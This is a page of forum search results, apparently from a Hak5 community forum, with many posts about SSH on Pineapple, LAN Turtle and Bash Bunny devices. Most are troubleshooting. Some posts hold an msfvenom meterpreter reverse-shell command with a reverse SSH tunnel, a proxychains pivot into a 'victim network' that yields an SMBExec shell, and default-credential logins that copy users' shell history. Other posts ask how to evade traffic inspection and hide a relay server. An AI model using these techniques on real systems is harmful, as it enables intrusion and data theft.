Search the Community

Is there a certain encryption algorithm that i should use when creating an ssh key pair that will bypass network-based inline traffic inspectors (eg CryptoAuditor). Maybe im using the wrong one (ssh-keygen -t rsa -b 4096) and i'll get pulled up? Any info on how these bits of kit makes me visible and how to bypass them will be greatly appreciated.

This was not my original script, it was created for OpenWRT operating systems, but it did not work on the Tetra by default. I simply made a fork and modified it for anyone who would like to switch to Oh My ZSH as their default SSH terminal vs busybox(ash). I know I wanted to ?! Here is the quick copy and paste script: opkg update && opkg install ca-certificates zsh curl git-http sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)" sed -i -- 's:/bin/ash:/bin/zsh:g' /etc/passwd #reboot Or view below.. Gist Code PS: I do not own any other Pineapple models, so I can not tell you if it works for others.

For a larger project, I am exploring the use of Powershell to automate network tasks. In the enclosed script, I am assuming someone has a Raspberry Pi named PiM3.local with default username and password on my local network. I use Posh-SSH which can be installed within Powershell by Install-Module Posh-SSH . I then execute a command with SSH, grab the .bash-history and put a new file in the Pi. One could, of course, use nmap to find computers with port 22 and then proceed with something like this to see what happens. One could of course use the wifi pineapple to ... and so on. Are there loose pi's where you live? RaspberySFTP.ps1

My kali machine is in a LAN, in order to get a reverse connection from the victim outside the LAN, I set up a remote ssh tunnel ssh -N -R 45679:localhost:45679 user@aaa.aaa.aaa.aaa -p 45678 The ssh server is also inside another LAN, but port forwarding is possible, so I forwarded 45678 as ssh port, and 45679 as the reverse connection port. Tested with netcat, and apache server, worked. Now, here is the configuration of the malware generated by msfvenom msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=aaa.aaa.aaa.aaa LPORT=45679 -f exe -o mal.exe And here is the multi/handler configuration under msf msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.0.102 yes The listen address LPORT 45679 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target Then I exploit, nothing happens on the handler, no session receive, but the ssh terminal continuously showing the following message once I run the malware on the victim machine connect_to localhost port 45679: failed. connect_to localhost port 45679: failed. connect_to localhost port 45679: failed. I did a scan on aaa.aaa.aaa.aaa:45679, no open port discovered. Since NC and apache test works, SSH tunnel should be functioning properly, so it is the handler's problem? My thought is, the multi handler is somehow not listening/connecting to the tunneled port, but I am not sure how could that happen, doesn't remote ssh tunnel automatically apply to global once the command is running? Any ideas, or workarounds? This should be a FAQ, yet, couldn't find right way... Thank you

When running the following payload: LED G ATTACKMODE RNDIS_ETHERNET And try to SSH into the bunny (172.16.64.10) with Putty. As root I always get 'Access Denied' I've change the default password using attackmode serial but that password is not working for SSH. I even set it back to the default hak5bunny password, but still no joy. What am I missing here?

Hello I am thinking of buying a smash rabbit and I want to find out a way to ssh into it. I heard that if I want to SSH into the rabbit I have to "waste" a payload for the bunny to emulate RNIDS_ETHER. Is this correct? Or is there some other way for it to emulate a usb-to-ethernet adapter upon boot without having to use a payload? I dunno, stick something in the .profile? Thanks!

Hi, if I install avahi-daemon and put ATTACKMODE RNIDS_ETHER in something like .bashrc or .profile, can I SSH into the bunny with sudo ssh root@bunny.local? I greatly prefer SSH over serial so I would really like my method above to work. I don't own a bash bunny, although I might buy it at some point, I'm just considering. Thanks!

So I received my Wifi Pineapple NANO a few days ago and it worked fine on first try, I got on to the web interface and reached the point of updating the firmware and I think I may have messed up. Now whenever I plug the nano in, the light flashes twice holds for about 5 seconds then turns off, I can't ssh to it, I can't get the web interface and I can't see it as a wifi network. Any advice?

Hey all, I'm new, had the LAN turtle for about three weeks and I'm loving it. I have limited knowledge of the RF spectrum and I'm new to networks etc, but I've learnt so much by solving problems as I've gone along. However one thing I'm stuck with is setting up an SSH tunnel to the turtle remotely, in order to get a more diverse capture than I believe URLsnarf is capable of. Current setup Windows 10 putty (and/or Kali in Vbox) SSH to a digitalocean VPS SSH into my turtle remotely. I've searched the forums and googled for "wireshark remote ssh capture" etc, but everything I find seems either irrelevant or goes way over my head. From what I did understand it seems like I may not be able to do it. And I figured if it was possible, wouldn't everyone be using Wireshark instead of URLSnarf (which seems basic to me) Questions Do any of you gurus know if it is possible to get a relatively comprehensive live capture from the LAN turtle via SSH? Has anyone done this yet?

===========================SOLUTION============================== Generate the following payload without STORAGE in the attackmode. #!/bin/bash LED G ATTACKMODE ECM_ETHERNET Thanks to Fang_Shadow, I've learned that using storage in concert ECM_ETHERNET prevents the system from pulling an IP (for what reason I still don't understand - I'm guessing it's just a bug). I have had some issues with SSH but according to ifconfig (on local system) I see the interface is up and nmap scans show port 22 is open on the new IP, I'll update this post if anything changes. =================================================================== Endgoal: I want to ssh from host machine into my BashBunny, then pivot from my BashBunny to a remote cloud hosted webserver, and write a testfile to that server. Host System Used: Debian Linux Crux: I am unable to acquire an ip address for my BashBunny using bb.sh Attempts: 1. I tried to perform these actions from Arming Mode using the serial connection, however I learned that I am not able to share my network connection from serial mode and that Arming Mode only allows: Serial and Storage 2. I attempted to run the default payload in order to gain network connectivity: #!/bin/bash LED G ATTACKMODE ECM_ETHERNET STORAGE My understanding of this code is that it will indicate it is ready when there is a solid green light (LED G) and that it will facilitate Ethernet connectivity and Storage (Last line), it is also my understanding that this initializes a new network interface that can be seen with the commands "ip addr" or "ifconfig -a". However this new interface does not appear to be configured yet and attempting to run the command ssh root@172.16.64.1 does not result in the expected login prompt and eventually times out. 3. I've also attempted to run the bb.sh in order to share my hosts network connection, despite not being able to ssh into 172.16.64.1 IP. The script appears to work until you attempt to connect with it, and then it just hangs. Any ideas on how to ssh into the BashBunny? Thanks, Jay

I am unable to SCP or SSH to the mark V. Getting "permission denied" error for both. This has been constant prior to today; however, today when minimizing infusions they will no longer maximize again and I cannot factory reset or even properly reboot the device. So I need to be able to reflash it over SSH. Any ideas? Am I overlooking something here? Using port 22 for both.

I want to automate an SSH login. I was looking at sshpass or expect. But I haven't been able to find a working example of either. Anyboy use either of these? Also something of note. I don't know the hostname of the remote machine yet. I'm trying to get that in an automated way as well. I've tried raceroute, smbclient, nslookup, host, arp, and finger. Expect needs to expect user@host before it can send any commands over SSH but I don't know the hostname at this point.

I am a complete noob at this, so I could be doing something completely wrong. Just got the Lan turtle today. Plugged it in with a phone charger meeting minimium power requirements and connected it to a PC with an OTG ethernet-to-USB adapter. Had to setup the network connection manually (on Ubuntu 16.10) with: IP - 172.16.84.1, Netmask - 255.255.255.0, Gateway - 192.168.1.1, DNS Servers - 208.67.222.222 and 208.67.220.220. After that, I check the connection with ifconfig and everything appears to be OK, so I finally tried connecting to the Lan Turtle. :$ ssh root@172.16.84.1 Permission denied (publickey). I have setup openssh on a few of my PCs for ssh-key authentication only, but this the first time using the Lan Turtle. Also realised I cannot browse on the internet while it is connected, even with wifi and another wired connection available. I have searched around to see if there is a fix for this, but I canot find anything.

I have followed Hak5's YouTube instructions in LAN turtle basics of how to setup auto SSH. I have a remote server. SSH works if the lanturtle is plugged into the device sshing into it. However auto ssh does not work unless I type iptables -I INPUT 1 -i eth1 -p tcp --dport 22 -j ACCEPT But if I reboot the LAN turtle cannot ssh into it from my remote server, unless I rerun the iptables command Putting iptables -I INPUT 1 -i eth1 -p tcp --dport 22 -j ACCEPT in /etc/firewall.user does not help any ideas?

Hi, Just looking for some advice on using python pickle to create an authentic looking filesystem for cowrie, has anyone experience of this? I have run the createfs.py script from the cowrie utils folder and created a fake filesystem based on the systems filesystem, however this wont be great as their are a fair few clues that it is a honey pot (the user called cowrie, the cowrie folder etc etc.). Thanks in advance.

Hey guys, i was checking the System Log as I saw the following entries: auth.err sshd[2499]: error: Could not load host key: /etc/ssh/ssh_host_ecdsa_key auth.err sshd[2499]: error: Could not load host key: /etc/ssh/ssh_host_ed25519_key I recently made a fresh factory reset and update to 1.0.6. SSH into the pineapple is possible, but I wonder why the keys were not generated. Anyone else with this error message?

Hi all, How would you go about setting up a stand-alone Raspberry Pi, which would; Be powered by solar, battery, or any other method. At least a few days power, if possible. Have some sort of internet connection available, so one can SSH / NetCat to it. (Dongle?) Be as small and discreet as possible, so it doesn't get stolen. *edit* Think weather monitoring station, but too far away to connect to the same WiFi network as your home PC, and not in range of any free WiFi hotspots.

(please notice that this is being conducted as a security evaluation in my own company, nothing in here can get me in legal trouble since I own the network and all the computers connected to it) Hi, I need to create a relay server for my pineapple to ssh to when I deploy it in position. The thing is, I need it to be completely untreaceable back to me, otherwise my IT guys would find it too easily. They know they're going to be tested, they agreed to it and to not knowing when this is going to happen. My question is, how would you guys go about: buying the hosting/remote server/vps so that it cannot be connected back to you? what kind of server would you use for a relay server? what security measures would you take so your anonimity is preserved? Thanks a lot!

Hello! After reading about the LanTurtle and watching the videos for it i have a few questions about the product before i purchase it. Lets make the example that i have successfully installed the LanTurtle on a targeted computer. I've got remote SSH connection to Turtle and a meterpreter session active. As i've understood correctly the lanturtle is the only equipment on the network i have access to and not even the computer it is attached to! So if i want to get access to computers on the network i could use the meterpreter session and launch attacks to the computers from the turtle and get a new meterpreter into the new computer and work from there? If there is a vulnerable computer on the network of course. Can the Turtle which is connected to the network also visit network folders/disks? Let's say there is a computer/Server sharing files and its accessible by anyone on the network. Can the Turtle access these network folders if they are open for the network the Turtle is connected to and transfer these files to the SSH server forexample? I'm pretty new to metasploit but still learning how it works and how it would work out with the LanTurtle the practical way. Also a great tool when i perform pentest for the local companies (FYI: legal and paid work, i don't plan to abuse this if someone were to ask ) i mostly do physical testing and assesment and this would be a really good tool for me as my other co-worker do the software/web part.

Hi everyone . Im new here. Let em introduce ,my name is Alexandre , im from brazil I have been learning a lot about penetrating and hack mods here i have a test im tryng to made and im not pretty sure how to complete this The scenario is this. i need to be able to connect to my work network to work from home i work in a support 7/24 , some times i don't want to come to work because is just me alone in the front of the computer some times i spend all week whit no issue so i want to be able to open a intranet site in my house. how is the best way to accomplish this? Can i create a vpn between my house connection and turtle module? then in my browser be able to open a local intranet webpage? Maybe a raspberry pi whit some tools? i can provide my own credentials to the box , so i think will have same privileges as me. how this can be done? mitmproxy ? how can i act like im on work ?? is this possible? is just a dream? sorry my english is not that good thanks in avance

Hi all! Just wanted to share something that might help other Lan Turtlers out there. One of the things I wanted to do with my lan turtle was to pivot my tools from my local box through the turtle. One such way is to use proxychains to proxy your local tools through your VPS in the cloud, and out through your turtle. My setup: [Local Kali box] --> (Router) --> [VPS] --> [turtle, which is inside victim network] I ran into trouble trying to figure out how to setup an SSH proxychain to it...found this article which worked right away: https://superuser.com/questions/332850/ssh-as-socks-proxy-through-multiple-hosts I used the first line, which was this command: ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p machine-b" machine-c Here, machine-b would be the username@ip_of_VPS_in_cloud and machine-c would be the turtle, which should be root@localhost -p 2222 By replacing the "$PORT" with whatever you want (I used 9050, the default in the proxychains.conf), it would work flawlessly. Basically, what we are doing here is creating a Socks Proxy through SSH that goes through our VPS in the cloud, and then logs into the turtle (which already connects back to that VPS, through AutoSSH). With this tunnel, all you need to do is open up your proxychains.conf (/etc/proxychains.conf) and edit the last line to reflect the port you used. After that, you are all set! In Kali, just prepend "proxychains" before the tool you want to use.....for example! I wanted to be able to use Veil-Pillage from my local Kali box to get a SMBExec shell (because I already had credentials). So, by setting up the tunnel above, I ran root@kali#proxychains ./Veil-Pillage Which would take me to dialogue screen, I chose number 25, set my target (which was 10.13.37.27, a win7 VM) and my creds, and just hit ran! Veil-Pillage: post-explotation framework | [Version]: 1.1.2 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [*] Executing module: Smbexec Shell... [*] Type 'exit' to exit the shell Trying protocol 445/SMB... Creating service SystemDiag... |S-chain|-<>-***.***.***.***-<><>-10.13.37.27:445-<><>-OK [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32> And there you have it!! I thought this should be useful for everyone out there. Another way of doing it is to use your metasploit/armitage instance in the VPS, use the meterpreter module, setup the Socks4 proxy, and then setup proxychains to reflect your VPS instance. Don't forget to add route! Let me know your thoughts! TL;DR: SSH socks proxy -- root@kali#ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p VPS-in-cloud" turtle-in-VPS then change proxychains.conf, then "proxychains tool"

root@Pinebox:~# nano .test Error opening terminal: xterm-256color. I ssh'd into my pineapple today after doing a factory restore, and started getting this error. Anybody gotten this before?

Hi guys, I recently started learning more about ethical hacking and stumbled upon metasploit. It is a great tool but I am having an issue on a pen test, which is the following. I am trying to exploit my IPad Air- IOS 8.1.1 Jailbroken and I am using the exploit "exploit/apple_ios/ssh/cydia_default_ssh". Also the OS I am running is Kali Linux. I am able to setup the RHOST with my IP Address (192.168.1.2) and the default port 22. This data is confirmed and accurate as I did a nmap scan just before that showed me that the port 22 was open on that IP. Everything seems fine until i try to run the exploit, what happens is this: [*] 192.168.1.2:22 - Attempt to login as 'root' with password 'alpine' [-] 192.168.1.2:22 SSH Error: Net::SSH::Exception : could not settle on kex algorithm [*] 192.168.1.2:22 - Attempt to login as 'mobile' with password 'dottie' [-] 192.168.1.2:22 SSH Error: Net::SSH::Exception : could not settle on kex algorithm I have left the root:alpine login as per default in my ipad. I had even changed the password in my Ipad's terminal and tried to login via Armitage with SSH Login and the updated credentials. Still, I am always getting the same error and not sure what is going on. Can anyone help here? Cheers

I am running an ssh server on my Ubuntu server but I don't like to use the default port of 22. I have the relay server working with auto ssh on the pineapple using port 22. Is there a way that I can use a different port with the Auto ssh? Thank you Mark.

Hello, I have successfully enabled AutoSSH on my Pineapple so I can remotely access the web interface (e.g. 164.84.38.155:666). However, I am having trouble SSH'ing into it via command line. I am trying to SSH into the exact same address which is working from the browser GUI (164.84.38.155:666), but it is not working. When I try: ssh root@164.84.38.155:666 I get this error: ssh: Could not resolve hostname 164.84.38.155:666: Name or service not known Is there a different address I'm suppose to SSH into or some other setting I need to configure? Thanks.